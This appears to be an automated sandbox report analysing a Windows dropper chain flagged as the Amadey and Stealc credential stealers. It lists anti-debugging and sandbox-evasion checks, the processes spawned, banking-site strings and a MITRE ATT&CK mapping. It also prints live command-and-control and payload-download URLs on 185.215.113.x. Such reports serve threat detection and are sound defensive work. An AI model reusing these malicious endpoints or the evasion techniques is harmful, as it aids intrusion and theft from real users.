Source: Web Data.18.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Web Data.18.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Web Data.18.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 4bea71e542.exe, 00000006.00000002.2260142696.00000000017CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Web Data.18.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Web Data.18.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2030864626.0000000000C1D000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000002.00000002.2047893030.000000000031D000.00000040.00000001.01000000.00000008.sdmp, explorti.exe, 00000003.00000002.2049337158.000000000031D000.00000040.00000001.01000000.00000008.sdmp, explorti.exe, 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmp, 44affe150c.exe, 00000005.00000002.2188158622.000000000105C000.00000040.00000001.01000000.0000000A.sdmp, 4bea71e542.exe, 00000006.00000002.2258291558.0000000000E4C000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Web Data.18.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Web Data.18.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

graph_8-95941

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	File opened: NTICE
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	File opened: SICE
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0542068B rdtsc

0_2_0542068B

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_0084EAA2 BlockInput,

8_2_0084EAA2

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_00802622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_00802622

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_007D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

8_2_007D42DE

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 4_2_0016645B mov eax, dword ptr fs:[00000030h]	4_2_0016645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 4_2_0016A1C2 mov eax, dword ptr fs:[00000030h]	4_2_0016A1C2
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007F4CE8 mov eax, dword ptr fs:[00000030h]	8_2_007F4CE8

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_00830B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

8_2_00830B62

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_00802622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00802622
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007F083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_007F083F
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007F09D5 SetUnhandledExceptionFilter,	8_2_007F09D5
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007F0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_007F0C21

Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: 44affe150c.exe PID: 4592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4bea71e542.exe PID: 6604, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

8_2_00831201

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_00812BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

8_2_00812BA5

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_0083B226 SendInput,keybd_event,

8_2_0083B226

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_008522DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

8_2_008522DA

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe "C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe "C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe "C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

8_2_00830B62

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_00831663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

8_2_00831663

Source: ca798c703b.exe, 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmp, ca798c703b.exe.4.dr, random[1].exe0.4.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ca798c703b.exe	Binary or memory string: Shell_TrayWnd
Source: explorti.exe, explorti.exe, 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: !Program Manager
Source: 44affe150c.exe, 44affe150c.exe, 00000005.00000002.2188158622.000000000105C000.00000040.00000001.01000000.0000000A.sdmp, 4bea71e542.exe, 4bea71e542.exe, 00000006.00000002.2258291558.0000000000E4C000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: \Program Manager

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 4_2_0014D312 cpuid

4_2_0014D312

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 4_2_0014CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

4_2_0014CB1A

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 4_2_001365B0 LookupAccountNameA,

4_2_001365B0

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_0080B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

8_2_0080B952

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_007D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

8_2_007D42DE

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 4.2.explorti.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.explorti.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.explorti.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2047827311.0000000000131000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2087027193.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2030799829.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2009107509.0000000004900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2007572874.0000000004940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1990276084.0000000005200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2049238271.0000000000131000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000005.00000002.2189503708.000000000134E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2260142696.00000000017CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 44affe150c.exe PID: 4592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4bea71e542.exe PID: 6604, type: MEMORYSTR

Source: ca798c703b.exe	Binary or memory string: WIN_81
Source: ca798c703b.exe	Binary or memory string: WIN_XP
Source: random[1].exe0.4.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: ca798c703b.exe	Binary or memory string: WIN_XPe
Source: ca798c703b.exe	Binary or memory string: WIN_VISTA
Source: ca798c703b.exe	Binary or memory string: WIN_7
Source: ca798c703b.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 00000005.00000002.2189503708.000000000134E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2260142696.00000000017CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 44affe150c.exe PID: 4592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4bea71e542.exe PID: 6604, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_00851204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		8_2_00851204
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_00851806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		8_2_00851806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	21 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	21 Access Token Manipulation	12 Software Packing	NTDS	227 System Information Discovery	Distributed Component Object Model	Input Capture	125 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 DLL Side-Loading	LSA Secrets	861 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	11 Masquerading	Cached Domain Credentials	461 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	2 Valid Accounts	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	461 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	54%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
chrome.cloudflare-dns.com	0%	Virustotal	Browse
s-part-0032.t-0009.t-msedge.net	0%	Virustotal	Browse
bzib.nelreports.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://185.215.113.100/	100%	URL Reputation	malware
http://185.215.113.100/e2b1563c6670f193.php	100%	URL Reputation	malware
http://185.215.113.100	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://bzib.nelreports.net/api/report?cat=bingbusiness	0%	URL Reputation	safe
https://chrome.cloudflare-dns.com/dns-query	0%	URL Reputation	safe
http://185.215.113.100E	0%	Avira URL Cloud	safe
https://msn.com	0%	Avira URL Cloud	safe
http://185.215.113.100t1q	0%	Avira URL Cloud	safe
http://185.215.113.19/Vi9leo/index.phpkD	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php-B	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php&DlR	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpG	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phptch	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php	100%	Avira URL Cloud	malware
http://185.215.113.100/=g	100%	Avira URL Cloud	malware
http://185.215.113.16/steam/random.exeg	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpw	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpG	19%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phptch	3%	Virustotal		Browse
http://185.215.113.16/steam/random.exe6522	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php_D	100%	Avira URL Cloud	phishing
https://msn.com	0%	Virustotal		Browse
https://myaccount.google.com/signinoptions/passwordC:	0%	Avira URL Cloud	safe
http://185.215.113.16/steam/random.exeg	20%	Virustotal		Browse
http://185.215.113.100/e2b1563c6670f193.php/5	100%	Avira URL Cloud	malware
https://www.office.com/	0%	Avira URL Cloud	safe
http://185.215.113.19/Vi9leo/index.phpw	3%	Virustotal		Browse
http://185.215.113.16/well/random.exe	100%	Avira URL Cloud	phishing
http://185.215.113.100/e2b1563c6670f193.php/	100%	Avira URL Cloud	malware
http://185.215.113.19/Vi9leo/index.php	24%	Virustotal		Browse
https://www.office.com/	0%	Virustotal		Browse
http://185.215.113.100/e2b1563c6670f193.php/5	19%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phpKBzS	100%	Avira URL Cloud	phishing
http://185.215.113.19/	100%	Avira URL Cloud	phishing
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://185.215.113.16/well/random.exe	25%	Virustotal		Browse
http://185.215.113.100/e2b1563c6670f193.php2	100%	Avira URL Cloud	malware
http://185.215.113.19/Vi9leo/index.php.ETS	100%	Avira URL Cloud	phishing
http://185.215.113.100/e2b1563c6670f193.php/	7%	Virustotal		Browse
http://185.215.113.100/e2b1563c6670f193.php6	100%	Avira URL Cloud	malware
http://185.215.113.16/steam/random.exe	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php#A	100%	Avira URL Cloud	phishing
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://www.office.com/Office	0%	Avira URL Cloud	safe
http://185.215.113.19/	19%	Virustotal		Browse
http://185.215.113.100/e2b1563c6670f193.php2	11%	Virustotal		Browse
http://185.215.113.100%6	0%	Avira URL Cloud	safe
http://185.215.113.16/steam/random.exe65	100%	Avira URL Cloud	phishing
http://185.215.113.16/steam/random.exe6522	20%	Virustotal		Browse
http://185.215.113.100/t	100%	Avira URL Cloud	malware
http://185.215.113.19/Vi9leo/index.php1E_S	100%	Avira URL Cloud	phishing
http://185.215.113.16/steam/random.exe	24%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.php#A	24%	Virustotal		Browse
http://185.215.113.100/x	100%	Avira URL Cloud	malware
http://185.215.113.19/Vi9leo/index.php_BfS	100%	Avira URL Cloud	phishing
https://www.google.com/favicon.ico	0%	Avira URL Cloud	safe
http://185.215.113.100/x	11%	Virustotal		Browse
http://185.215.113.100/w	100%	Avira URL Cloud	malware
http://185.215.113.19/Vi9leo/index.phpTD	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php0	100%	Avira URL Cloud	phishing
http://185.215.113.100/w	11%	Virustotal		Browse
http://185.215.113.100/e2b1563c6670f193.php6	8%	Virustotal		Browse
https://www.google.com/favicon.ico	0%	Virustotal		Browse
http://185.215.113.19/fae1daa8e9eb0eefeb8846d934f48b15eaa495c49##Le	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php53001	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php0	19%	Virustotal		Browse
https://www.office.com/Office	0%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phpW-jS	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpaB	100%	Avira URL Cloud	phishing
http://185.215.113.100/e2b1563c6670f193.php~	100%	Avira URL Cloud	malware
http://185.215.113.19/Vi9leo/index.php000	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php~D	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpG-zS	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php.	100%	Avira URL Cloud	malware
http://185.215.113.19/d5f9dd0246b5cb4f6522427fae1daa8e9eb0eefeb8846d934f48b15eaa495c49#0	100%	Avira URL Cloud	phishing
http://185.215.113.100/t	11%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
chrome.cloudflare-dns.com	172.64.41.3	true	false	0%, Virustotal, Browse	unknown
s-part-0032.t-0009.t-msedge.net	13.107.246.60	true	false	0%, Virustotal, Browse	unknown
bzib.nelreports.net	unknown	unknown	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.100/	true	URL Reputation: malware	unknown
http://185.215.113.19/Vi9leo/index.php	true	24%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.16/steam/random.exe	false	24%, Virustotal, Browse Avira URL Cloud: phishing	unknown
